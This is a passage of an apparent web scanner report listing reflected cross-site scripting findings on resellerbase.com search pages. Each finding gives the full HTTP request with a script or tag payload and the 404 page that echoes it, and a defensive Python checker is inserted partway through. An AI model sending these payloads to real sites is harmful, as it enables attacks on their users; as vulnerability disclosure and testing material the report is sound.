<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail381a5<script>alert(1)</script>8c95f396ba3/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1712. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9eeb<script>alert(1)</script>2a1d6e2596f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20d9eeb<script>alert(1)</script>2a1d6e2596f/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20d9eeb<script>alert(1)</script>2a1d6e2596f/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1713. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69ab6<script>alert(1)</script>fa5f29d0c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes69ab6<script>alert(1)</script>fa5f29d0c/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes69ab6<script>alert(1)</script>fa5f29d0c/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...
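The reflection shown above can be re-checked offline from the captured response. The following Python is an added example and is not part of the scanner report or of the target application; the function names, the abbreviated response bytes (transcribed from the request and response of 2.1713) and the not_found_page stand-in for the server's 404 template are this example's own assumptions. It classifies how the canary came back, maps the two probe results onto the report's Certain/Firm confidence levels, shows that HTML-encoding the echoed URI turns the same page into an "encoded" (safe) result, and shows what a browser actually puts on the wire for a path containing < and >.

```python
"""Added example (not part of the scanner report): re-check a reflected-XSS
finding offline from a captured response, the way a reviewer would before
accepting the scanner's Certain/Firm verdict, and show the same 404 page
once the echoed URL is HTML-encoded."""
import html
import re
import secrets
from urllib.parse import quote

SCRIPT_PAYLOAD = "<script>alert(1)</script>"   # the scanner's "Certain" probe
TAG_PAYLOAD = "<a>"                            # the scanner's "Firm" probe


def make_canary(payload):
    """Burp-style marker: random hex on both sides of the payload so the
    reflection can be located unambiguously in a large response."""
    return secrets.token_hex(3)[:5], payload, secrets.token_hex(6)[:11]


def split_response(raw):
    """Split a raw HTTP/1.x response into a lower-cased header dict and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def classify_reflection(raw_response, prefix, payload, suffix):
    """How the payload between the markers came back: 'verbatim' (executable),
    'encoded' (safe), 'modified', 'not-reflected', or 'not-html' (the body is
    not rendered as HTML, so no script runs regardless of the echo)."""
    headers, body = split_response(raw_response)
    if not headers.get("content-type", "").lower().startswith("text/html"):
        return "not-html"
    text = body.decode("utf-8", "replace")
    match = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), text, re.S)
    if match is None:
        return "not-reflected"
    echoed = match.group(1)
    if echoed == payload:
        return "verbatim"
    if echoed in (html.escape(payload), html.escape(payload, quote=False)):
        return "encoded"
    return "modified"


def scanner_confidence(script_verdict, tag_verdict):
    """Map the two probe results onto the confidence levels used in the report."""
    if script_verdict == "verbatim":
        return "Certain"
    if tag_verdict == "verbatim":
        return "Firm"
    return "None"


def not_found_page(request_uri, encode=True):
    """Stand-in (assumed, not the server's code) for the 404 body the report
    shows; with encode=True the one-line fix is applied: HTML-encode the
    request URI before writing it into the page."""
    shown = html.escape(request_uri) if encode else request_uri
    return ("HTTP/1.0 404 Not Found\r\nContent-Type: text/html\r\n\r\n"
            "<p>The requested URL " + shown +
            " was not found on this server.</p>").encode()


def browser_path(path):
    """What a WHATWG-conformant browser sends for a path typed or linked with
    raw '<' and '>': both are percent-encoded. (Python's quote is stricter
    than browsers and also encodes parentheses.)"""
    return quote(path, safe="/")


# Constructed from the request and response of finding 2.1713
# (headers abbreviated, body reduced to the reflected line).
PREFIX, SUFFIX = "69ab6", "fa5f29d0c"
PROBE_URI = ("/detail/20/themes" + PREFIX + SCRIPT_PAYLOAD + SUFFIX +
             "/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2")
CAPTURED_404 = (
    b"HTTP/1.0 404 Not Found\r\n"
    b"Server: Apache/2\r\n"
    b"X-Powered-By: PHP/5.2.14\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<p>The requested URL " + PROBE_URI.encode() + b" was not found on this server.</p>"
)

if __name__ == "__main__":
    print(classify_reflection(CAPTURED_404, PREFIX, SCRIPT_PAYLOAD, SUFFIX))
    print(classify_reflection(not_found_page(PROBE_URI), PREFIX, SCRIPT_PAYLOAD, SUFFIX))
    print(browser_path("/detail/20/themes" + PREFIX + SCRIPT_PAYLOAD + SUFFIX))
```

Run against the captured bytes the verdict is "verbatim"; run against the encoded stand-in it is "encoded", which is the result the fix should produce on the live host. The browser_path output shows why the manual check matters: a victim's browser sends %3Cscript%3E, so the page is only exploitable through a link if the 404 handler decodes the path before echoing it.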

2.1714. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bcba1<script>alert(1)</script>b53cc99000f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmosbcba1<script>alert(1)</script>b53cc99000f/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmosbcba1<script>alert(1)</script>b53cc99000f/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1715. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ca402<script>alert(1)</script>1aa72683a59 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/imagesca402<script>alert(1)</script>1aa72683a59/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/imagesca402<script>alert(1)</script>1aa72683a59/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1716. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cc06c<script>alert(1)</script>578e584fd05 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/search.phpcc06c<script>alert(1)</script>578e584fd05?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.phpcc06c<script>alert(1)</script>578e584fd05?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1717. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d77b2<a>7549e59f96c was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The sink here is the same 404 page that reflects a <script> payload verbatim when it is placed in a path segment (2.1713 to 2.1716) or in the name of a query parameter (2.1719), so the unsuccessful attempt concerns query-parameter values only; the manual check should look for a filter applied to those values before the request URL is written into the page.

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd77b2<a>7549e59f96c&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd77b2<a>7549e59f96c&opt=2 was not found on this server.</p>
...[SNIP]...

2.1718. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f9cbe<a>37e64226ccd was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...f9cbe<a>37e64226ccd&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...f9cbe<a>37e64226ccd&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1719. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4cb1c<script>alert(1)</script>8c54d90f3f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4cb1c<script>alert(1)</script>8c54d90f3f3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&4cb1c<script>alert(1)</script>8c54d90f3f3=1 was not found on this server.</p>
...[SNIP]...

2.1720. http://www.resellerbase.com/detail/20/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bcaf6<a>da880dd1acc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2bcaf6<a>da880dd1acc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2bcaf6<a>da880dd1acc was not found on this server.</p>
...[SNIP]...

2.1721. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dde6a<script>alert(1)</script>99438442622 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildde6a<script>alert(1)</script>99438442622/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildde6a<script>alert(1)</script>99438442622/20/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1722. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a7540<script>alert(1)</script>63e945e0fe3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20a7540<script>alert(1)</script>63e945e0fe3/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20a7540<script>alert(1)</script>63e945e0fe3/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1723. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e33c<script>alert(1)</script>4cca52b1ff3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes1e33c<script>alert(1)</script>4cca52b1ff3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes1e33c<script>alert(1)</script>4cca52b1ff3/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1724. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f270<script>alert(1)</script>bf31f733122 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos6f270<script>alert(1)</script>bf31f733122/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos6f270<script>alert(1)</script>bf31f733122/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1725. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 22860<script>alert(1)</script>985e9a4ae8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/themes/kosmos/search.php22860<script>alert(1)</script>985e9a4ae8e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php22860<script>alert(1)</script>985e9a4ae8e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1726. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e7a94<a>90ccc4c7f6e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As with the findings for the path segments of this URL (2.1721 to 2.1725), the sink is the 404 page that echoes the requested URL; a <script> payload in a path segment is reflected verbatim there, so whatever blocked the scanner's script payload applies to query-parameter values only and should be identified during the manual check.

Request

GET /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Searche7a94<a>90ccc4c7f6e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/themes/kosmos/search.php?keyword=search...&Submit3=Searche7a94<a>90ccc4c7f6e&opt=2 was not found on this server.</p>
...[SNIP]...

2.1727. http://www.resellerbase.com/detail/20/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/themes/kosmos/search.php

Issue detail

